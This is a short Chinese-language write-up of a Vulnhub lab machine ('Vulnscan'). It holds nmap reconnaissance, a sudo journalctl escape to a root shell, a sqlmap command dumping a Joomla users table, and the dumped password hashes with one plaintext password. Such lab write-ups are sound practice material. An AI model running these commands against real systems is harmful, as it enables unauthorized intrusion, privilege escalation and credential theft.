Vulnhub系列--Vulnscan

image

tragte IP: 192.168.139.136

信息收集

nmap -A 192.168.139.136

image

开放5个服务,分别为:

  • 22: ssh
  • 5000: wordpress
  • 80: http
  • 8081: joomla
  • 9001: Drupal

逐个分析漏洞

wordpress

发现存在一个命令执行:

http://fsociety.web:5000/admin-wp/

image

依据时间发现存在用户名和密码,可以直接登录,反弹shell一直失败

image

登录后可以得到:

image

image

journalctl不需要密码直接root执行,利用方式:https://gtfobins.github.io/gtfobins/journalctl/

使用方式:

sudo /bin/journalctl
!/bin/bash

image

image

image

joomla

image

发现存在sql注入,直接注入可得用户名和密码:

sqlmap -u "http://192.168.139.136:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" -D joomla_db -T hs23w_users  --dump

image

usernamepasswordemail
joomlaCMS_admin$2y$10$EYc6SKfMLzlLE/IcD9a6XeAe2Uv7WTBFlbbqRrnpht1K0M1bLrWeeFluntence54@armyspy.com
elliot$2y$10$jddnEQpjriJX9jPxh6C/hOag4ZZXae4iVhL7GVRPC9SHWgqbi4SYy5T3e!_M0un7i@N

可以看到elliot的邮箱就是密码,可以直接登录:

image

Drupal

image

版本为7.54,搜索exploit:

image

image

image


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部